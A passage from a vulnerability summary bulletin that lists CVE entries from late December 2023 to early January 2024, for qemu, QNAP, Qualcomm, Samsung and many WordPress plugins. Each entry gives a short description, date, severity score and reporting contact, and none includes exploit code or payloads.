qemu — qemu A stack based buffer overflow was found in the virtio-net device of QEMU. This issue occurs when flushing TX in the virtio_net_flush_tx function if guest features VIRTIO_NET_F_HASH_REPORT, VIRTIO_F_VERSION_1 and VIRTIO_NET_F_MRG_RXBUF are enabled. This could allow a malicious user to overwrite local variables allocated on the stack. Specifically, the `out_sg` variable could be used to read a part of process memory and send it to the wire, causing an information leak. 2024-01-02 4.9 CVE-2023-6693
secalert@redhat.com
qnap_systems_inc. — qcalagent An OS command injection vulnerability has been reported to affect QcalAgent. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following version: QcalAgent 1.1.8 and later 2024-01-05 6.3 CVE-2023-41289
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QuTS hero h5.1.3.2578 build 20231110 and later 2024-01-05 6.6 CVE-2023-39294
security@qnapsecurity.com.tw
qnap_systems_inc. — qumagie A cross-site scripting (XSS) vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network. We have already fixed the vulnerability in the following version: QuMagie 2.2.1 and later 2024-01-05 5.5 CVE-2023-47559
security@qnapsecurity.com.tw
qnap_systems_inc. — video_station A SQL injection vulnerability has been reported to affect Video Station. If exploited, the vulnerability could allow users to inject malicious code via a network. We have already fixed the vulnerability in the following version: Video Station 5.7.2 ( 2023/11/23 ) and later 2024-01-05 4.3 CVE-2023-41287
security@qnapsecurity.com.tw
qualcomm,_inc. — snapdragon Memory corruption when IPv6 prefix timer object's lifetime expires which are created while Netmgr daemon gets an IPv6 address. 2024-01-02 6.7 CVE-2023-28583
product-security@qualcomm.com
qualcomm,_inc. — snapdragon Memory corruption while receiving a message in Bus Socket Transport Server. 2024-01-02 6.7 CVE-2023-33038
product-security@qualcomm.com
rust-ethereum — rust-ethereum Rust EVM is an Ethereum Virtual Machine interpreter. In `rust-evm`, a feature called `record_external_operation` was introduced, allowing library users to record custom gas changes. This feature can have some bogus interactions with the call stack. In particular, during finalization of a `CREATE` or `CREATE2`, in the case that the substack execution happens successfully, `rust-evm` will first commit the substate, and then call `record_external_operation(Write(out_code.len()))`. If `record_external_operation` later fails, this error is returned to the parent call stack, instead of `Succeeded`. Yet, the substate commitment already happened. This causes smart contracts able to commit state changes, when the parent caller contract receives zero address (which usually indicates that the execution has failed). This issue only impacts library users with custom `record_external_operation` that returns errors. The issue is patched in release 0.41.1. No known workarounds are available. 2024-01-02 5.9 CVE-2024-21629
security-advisories@github.com
rust-vmm — rust-vmm vmm-sys-util is a collection of modules that provides helpers and utilities used by multiple rust-vmm components. Starting in version 0.5.0 and prior to version 0.12.0, an issue in the `FamStructWrapper::deserialize` implementation provided by the crate for `vmm_sys_util::fam::FamStructWrapper` can lead to out of bounds memory accesses. The deserialization does not check that the length stored in the header matches the flexible array length. Mismatch in the lengths might allow out of bounds memory access through Rust-safe methods. The issue was corrected in version 0.12.0 by inserting a check that verifies the lengths of compared flexible arrays are equal for any deserialized header and aborting deserialization otherwise. Moreover, the API was changed so that header length can only be modified through Rust-unsafe code. This ensures that users cannot trigger out-of-bounds memory access from Rust-safe code. 2024-01-02 5.7 CVE-2023-50711
security-advisories@github.com
samsung_mobile — nearby_device_scanning Improper access control vulnerability in Nearby device scanning prior to version 11.1.14.7 allows local attacker to access data. 2024-01-04 4 CVE-2024-20808
mobile.security@samsung.com
samsung_mobile — nearby_device_scanning Improper access control vulnerability in Nearby device scanning prior to version 11.1.14.7 allows local attacker to access data. 2024-01-04 4 CVE-2024-20809
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Improper authentication vulnerability in Bluetooth pairing process prior to SMR Jan-2024 Release 1 allows remote attackers to establish pairing process without user interaction. 2024-01-04 6.8 CVE-2024-20803
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Improper access control in Notification service prior to SMR Jan-2024 Release 1 allows local attacker to access notification data. 2024-01-04 6.2 CVE-2024-20806
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Improper access control vulnerability in Samsung DeX prior to SMR Jan-2024 Release 1 allows owner to access other users’ notification in a multi-user environment. 2024-01-04 4.6 CVE-2024-20802
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Path traversal vulnerability in FileUriConverter of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file. 2024-01-04 4 CVE-2024-20804
mobile.security@samsung.com
sesami — cash_point_&_transport_optimizer An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows local attackers to obtain sensitive information and bypass authentication via “Back Button Refresh” attack. 2023-12-29 5.5 CVE-2023-31292
cve@mitre.org
sesami — cash_point_&_transport_optimizer CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows attackers to obtain sensitive information via the User Name field. 2023-12-29 5.3 CVE-2023-31296
cve@mitre.org
sesami — cash_point_&_transport_optimizer Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code and obtain sensitive information via the User ID field when creating a new system user. 2023-12-29 4.8 CVE-2023-31298
cve@mitre.org
sesami — cash_point_&_transport_optimizer Stored Cross Site Scripting (XSS) Vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code and obtain sensitive information via the Username field of the login form and application log. 2023-12-29 6.1 CVE-2023-31301
cve@mitre.org
silicon_labs — gecko_sdk Glitch detection is not enabled by default for the CortexM33 core in Silicon Labs secure vault high parts EFx32xG2xB, except EFR32xG21B. 2024-01-03 6.8 CVE-2023-5138
product-security@silabs.com
sourcecodester — engineers_online_portal A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Add Engineer Handler. The manipulation of the argument first name/last name with the input leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249182 is the identifier assigned to this vulnerability. 2023-12-29 6.1 CVE-2023-7160
cna@vuldb.com
spider-flow — spider-flow A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. 2024-01-02 6.3 CVE-2024-0195
cna@vuldb.com
thirtybees — bees_blog The beesblog (aka Bees Blog) component before 1.6.2 for thirty bees allows Reflected XSS because controllers/front/post.php sharing_url is mishandled. 2023-12-30 6.1 CVE-2023-52264
cve@mitre.org
tongda — office_anywhere_2017 A vulnerability has been found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/project/proj/delete.php. The manipulation of the argument PROJ_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-249367. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-30 4.3 CVE-2023-7180
cna@vuldb.com
vapor — vapor Vapor is an HTTP web framework for Swift. Prior to version 4.90.0, Vapor’s `vapor_urlparser_parse` function uses `uint16_t` indexes when parsing a URI’s components, which may cause integer overflows when parsing untrusted inputs. This vulnerability does not affect Vapor directly but could impact applications relying on the URI type for validating user input. The URI type is used in several places in Vapor. A developer may decide to use URI to represent a URL in their application (especially if that URL is then passed to the HTTP Client) and rely on its public properties and methods. However, URI may fail to properly parse a valid (albeit abnormally long) URL, due to string ranges being converted to 16-bit integers. An attacker may use this behavior to trick the application into accepting a URL to an untrusted destination. By padding the port number with zeros, an attacker can cause an integer overflow to occur when the URL authority is parsed and, as a result, spoof the host. Version 4.90.0 contains a patch for this issue. As a workaround, validate user input before parsing as a URI or, if possible, use Foundation’s `URL` and `URLComponents` utilities. 2024-01-03 6.5 CVE-2024-21631
security-advisories@github.com
view_component — view_component view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. Versions prior to 3.9.0 have a cross-site scripting vulnerability that has the potential to impact anyone rendering a component directly from a controller with the view_component gem. Note that only components that define a `#call` method (i.e. instead of using a sidecar template) are affected. The return value of the `#call` method is not sanitized and can include user-defined content. In addition, the return value of the `#output_postamble` method is not sanitized, which can also lead to cross-site scripting issues. Version 3.9.0 has been released and fully mitigates both the `#call` and the `#output_postamble` vulnerabilities. As a workaround, sanitize the return value of `#call`. 2024-01-04 6.1 CVE-2024-21636
security-advisories@github.com
winter_cms — winter_cms Winter is a free, open-source content management system. Users with access to backend forms that include a ColorPicker FormWidget can provide a value that would then be included without further processing in the compilation of custom stylesheets via LESS. This had the potential to lead to a Local File Inclusion vulnerability. This issue has been patched in v1.2.4. 2023-12-29 5.4 CVE-2023-52085
security-advisories@github.com
wiremock — wiremock WireMock with GUI versions 3.2.0.0 through 3.0.4.0 are vulnerable to stored cross-site scripting (SXSS) through the recording feature. An attacker can host a malicious payload and perform a test mapping pointing to the attacker’s file, and the result will render on the Matched page in the Body area, resulting in the execution of the payload. This occurs because the response body is not validated or sanitized. 2023-12-29 6.1 CVE-2023-50069
cve@mitre.org
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CRM Perks Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms through 1.2.8. 2023-12-29 6.1 CVE-2023-31095
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in WP Directory Kit. This issue affects WP Directory Kit through 1.1.9. 2023-12-29 6.1 CVE-2023-31229
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Dylan James Zephyr Project Manager. This issue affects Zephyr Project Manager through 3.3.9. 2023-12-29 6.1 CVE-2023-31237
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in Pexle Chris Library Viewer. This issue affects Library Viewer through 2.0.6. 2023-12-29 6.1 CVE-2023-32101
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in PluginOps MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder. This issue affects MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder through 4.0.9.3. 2023-12-29 6.1 CVE-2023-32517
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in CodexThemes TheGem – Creative Multi-Purpose & WooCommerce WordPress Theme allows Reflected XSS. This issue affects TheGem – Creative Multi-Purpose & WooCommerce WordPress Theme through 5.9.1. 2023-12-29 6.1 CVE-2023-50892
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in UpSolution Impreza – WordPress Website and WooCommerce Builder allows Reflected XSS. This issue affects Impreza – WordPress Website and WooCommerce Builder through 8.17.4. 2023-12-29 6.1 CVE-2023-50893
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HasThemes HT Mega – Absolute Addons For Elementor allows Reflected XSS. This issue affects HT Mega – Absolute Addons For Elementor through 2.3.8. 2023-12-29 6.1 CVE-2023-50901
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ian Kennerley Google Photos Gallery with Shortcodes allows Reflected XSS. This issue affects Google Photos Gallery with Shortcodes through 4.0.2. 2023-12-29 6.1 CVE-2023-51373
audit@patchstack.com
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Leevio Happy Addons for Elementor. This issue affects Happy Addons for Elementor through 3.9.1.1. 2023-12-29 6.5 CVE-2023-51676
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ShapedPlugin LLC WP Tabs – Responsive Tabs Plugin for WordPress allows Stored XSS. This issue affects WP Tabs – Responsive Tabs Plugin for WordPress through 2.2.0. 2024-01-05 6.5 CVE-2023-52124
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in webvitaly iframe allows Stored XSS. This issue affects iframe through 4.8. 2024-01-05 6.5 CVE-2023-52125
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress through 9.0.4. 2024-01-05 6.3 CVE-2023-52129
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in MojofyWP WP Affiliate Disclosure allows Stored XSS. This issue affects WP Affiliate Disclosure through 1.2.7. 2024-01-05 6.5 CVE-2023-52178
audit@patchstack.com
wordpress — wordpress The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the map title parameter in all versions up to and including 2.88.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-03 6.4 CVE-2023-6524
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘msg’ parameter in all versions up to, and including, 2.8.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. 2024-01-03 6.1 CVE-2023-6629
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The WP-Members Membership Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.4.8 via the wpmem_field shortcode. This makes it possible for authenticated attackers, with contributor access and above, to extract sensitive data including user emails, password hashes, usernames, and more. 2024-01-04 6.5 CVE-2023-6733
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Best WordPress Gallery Plugin – FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom attributes in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping. This makes it possible for contributors and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-03 6.4 CVE-2023-6747
security@wordfence.com
security@wordfence.com
wordpress — wordpress The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-06 6.4 CVE-2023-6801
security@wordfence.com
security@wordfence.com
wordpress — wordpress The WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to SQL Injection via the ‘group_id’ parameter in all versions up to, and including, 6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can be leveraged to achieve Reflected Cross-site Scripting. 2024-01-03 6.1 CVE-2023-6981
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin’s embed_oembed_html shortcode in all versions up to 3.9.5 (exclusive) due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-03 6.4 CVE-2023-6986
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom ID in all versions up to, and including, 5.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access and higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2024-01-04 6.4 CVE-2023-7044
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Automattic WordPress.Com Editing Toolkit allows Stored XSS. This issue affects WordPress.Com Editing Toolkit through 3.78784. 2023-12-29 5.4 CVE-2023-50879
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in The BuddyPress Community BuddyPress allows Stored XSS. This issue affects BuddyPress through 11.3.1. 2023-12-29 5.4 CVE-2023-50880
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More allows Stored XSS. This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More through 6.9.15. 2023-12-29 5.4 CVE-2023-50881
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in The Beaver Builder Team Beaver Builder – WordPress Page Builder allows Stored XSS. This issue affects Beaver Builder – WordPress Page Builder through 2.7.2. 2023-12-29 5.4 CVE-2023-50889
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Zoho Forms Form plugin for WordPress – Zoho Forms allows Stored XSS. This issue affects Form plugin for WordPress – Zoho Forms through 3.0.1. 2023-12-29 5.4 CVE-2023-50891
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brizy.Io Brizy – Page Builder allows Stored XSS. This issue affects Brizy – Page Builder through 2.4.29. 2023-12-29 5.4 CVE-2023-51396
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Brainstorm Force WP Remote Site Search allows Stored XSS. This issue affects WP Remote Site Search through 1.0.4. 2023-12-29 5.4 CVE-2023-51397
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in WPFactory Back Button Widget allows Stored XSS. This issue affects Back Button Widget through 1.6.3. 2023-12-29 5.4 CVE-2023-51399
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in CodePeople Calculated Fields Form. This issue affects Calculated Fields Form through 1.2.28. 2023-12-29 5.4 CVE-2023-51517
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Aleksandar Urošević Stock Ticker allows Stored XSS. This issue affects Stock Ticker through 3.23.4. 2023-12-29 5.4 CVE-2023-51541
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Designful Stylish Price List – Price Table Builder & QR Code Restaurant Menu. This issue affects Stylish Price List – Price Table Builder & QR Code Restaurant Menu through 7.0.17. 2024-01-05 5.4 CVE-2023-51673
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Basix NEX-Forms – Ultimate Form Builder – Contact forms and much more. This issue affects NEX-Forms – Ultimate Form Builder – Contact forms and much more through 8.5.2. 2024-01-05 5.4 CVE-2023-52120
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in NitroPack Inc. NitroPack – Cache & Speed Optimization for Core Web Vitals, Defer CSS & JavaScript, Lazy load Images. This issue affects NitroPack – Cache & Speed Optimization for Core Web Vitals, Defer CSS & JavaScript, Lazy load Images through 1.10.2. 2024-01-05 5.4 CVE-2023-52121
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Suman Bhattarai Send Users Email. This issue affects Send Users Email through 1.4.3. 2024-01-05 5.3 CVE-2023-52126
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Aaron J 404 Solution. This issue affects 404 Solution through 2.33.0. 2024-01-05 5.3 CVE-2023-52146
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in wp.Insider, wpaffiliatemgr Affiliates Manager. This issue affects Affiliates Manager through 2.9.30. 2024-01-05 5.3 CVE-2023-52148
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Floating Button. This issue affects Floating Button through 6.0. 2024-01-05 5.4 CVE-2023-52149
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Uncanny Automator, Uncanny Owl Uncanny Automator – Automate everything with the #1 no-code automation and integration plugin. This issue affects Uncanny Automator – Automate everything with the #1 no-code automation and integration plugin through 5.1.0.2. 2024-01-05 5.3 CVE-2023-52151
audit@patchstack.com
wordpress — wordpress The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘pagelayer_header_code’, ‘pagelayer_body_open_code’, and ‘pagelayer_footer_code’ meta fields in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This appears to be a reintroduction of a vulnerability patched in version 1.7.7. 2024-01-04 5.4 CVE-2023-6738
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator plugin for WordPress is vulnerable to unauthorized settings update due to a missing capability check when updating settings in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with author-level access or above to change the plugin’s settings including proxy settings, which are also exposed to authors. 2024-01-06 5.4 CVE-2023-6798
security@wordfence.com
security@wordfence.com
wordpress — wordpress The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.13. This is due to missing or incorrect nonce validation in the powerpack-lite-for-elementor/classes/class-pp-admin-settings.php file. This makes it possible for unauthenticated attackers to modify and reset plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2024-01-03 5.3 CVE-2023-6984
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Product Expiry for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ‘save_settings’ function in versions up to, and including, 2.5. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings. 2024-01-03 5.4 CVE-2024-0201
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in weForms weForms – Easy Drag & Drop Contact Form Builder For WordPress allows Stored XSS. This issue affects weForms – Easy Drag & Drop Contact Form Builder For WordPress through 1.6.17. 2023-12-29 4.8 CVE-2023-50896
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Ginger Plugins Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button allows Stored XSS. This issue affects Sticky Chat Widget: Click to chat, SMS, Email, Messages, Call Button, Live Chat and Live Support Button through 1.1.8. 2023-12-29 4.8 CVE-2023-51361
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Bit Assist Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget allows Stored XSS. This issue affects Chat Widget: WhatsApp Chat, Facebook Messenger Chat, Telegram Chat Bubble, Line Messenger, Live Chat Support Chat Button, WeChat, SMS, Call Button, Customer Support Button with floating Chat Widget through 1.1.9. 2023-12-29 4.8 CVE-2023-51371
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HasThemes HashBar – WordPress Notification Bar allows Stored XSS. This issue affects HashBar – WordPress Notification Bar through 1.4.1. 2023-12-29 4.8 CVE-2023-51372
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in ZeroBounce ZeroBounce Email Verification & Validation allows Stored XSS. This issue affects ZeroBounce Email Verification & Validation through 1.0.11. 2023-12-29 4.8 CVE-2023-51374
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in CleanTalk – Anti-Spam Protection Spam protection, Anti-Spam, FireWall by CleanTalk. This issue affects Spam protection, Anti-Spam, FireWall by CleanTalk through 6.20. 2024-01-05 4.3 CVE-2023-51535
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Awesome Support Team Awesome Support – WordPress HelpDesk & Support Plugin. This issue affects Awesome Support – WordPress HelpDesk & Support Plugin through 6.1.5. 2024-01-05 4.3 CVE-2023-51538
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Apollo13Themes Apollo13 Framework Extensions. This issue affects Apollo13 Framework Extensions through 1.9.1. 2024-01-05 4.3 CVE-2023-51539
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP Zone Inline Image Upload for BBPress. This issue affects Inline Image Upload for BBPress through 1.1.18. 2024-01-05 4.3 CVE-2023-51668
audit@patchstack.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in AAM Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More. This issue affects Advanced Access Manager – Restricted Content, Users & Roles, Enhanced Security and More through 6.9.18. 2023-12-29 4.7 CVE-2023-51675
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search through 2.0.33. 2024-01-05 4.3 CVE-2023-51678
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Icegram Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building. This issue affects Icegram Engage – WordPress Lead Generation, Popup Builder, CTA, Optins and Email List Building through 3.1.18. 2024-01-05 4.3 CVE-2023-52119
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Job Board. This issue affects Simple Job Board through 2.10.6. 2024-01-05 4.3 CVE-2023-52122
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPChill Strong Testimonials. This issue affects Strong Testimonials through 3.1.10. 2024-01-05 4.3 CVE-2023-52123
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WPClever WPC Product Bundles for WooCommerce. This issue affects WPC Product Bundles for WooCommerce through 7.3.1. 2024-01-05 4.3 CVE-2023-52127
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WhiteWP White Label – WordPress Custom Admin, Custom Login Page, and Custom Dashboard. This issue affects White Label – WordPress Custom Admin, Custom Login Page, and Custom Dashboard through 2.9.0. 2024-01-05 4.3 CVE-2023-52128
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in wp.Insider, wpaffiliatemgr Affiliates Manager. This issue affects Affiliates Manager through 2.9.31. 2024-01-05 4.3 CVE-2023-52130
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Smash Balloon Custom Twitter Feeds – A Tweets Widget or X Feed Widget. This issue affects Custom Twitter Feeds – A Tweets Widget or X Feed Widget through 2.1.2. 2024-01-05 4.3 CVE-2023-52136
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Republish Old Posts. This issue affects Republish Old Posts through 1.21. 2024-01-05 4.3 CVE-2023-52145
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP Job Portal WP Job Portal – A Complete Job Board. This issue affects WP Job Portal – A Complete Job Board through 2.0.6. 2024-01-05 4.3 CVE-2023-52184
audit@patchstack.com
wordpress — wordpress The Depicter Slider – Responsive Image Slider, Video Slider & Post Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the ‘save’ function. This makes it possible for unauthenticated attackers to modify the plugin’s settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. CVE-2023-51491 appears to be a duplicate of this issue. 2024-01-05 4.3 CVE-2023-6493
security@wordfence.com
security@wordfence.com
wordpress — wordpress The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 6.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. 2024-01-04 4.4 CVE-2023-6498
security@wordfence.com
security@wordfence.com
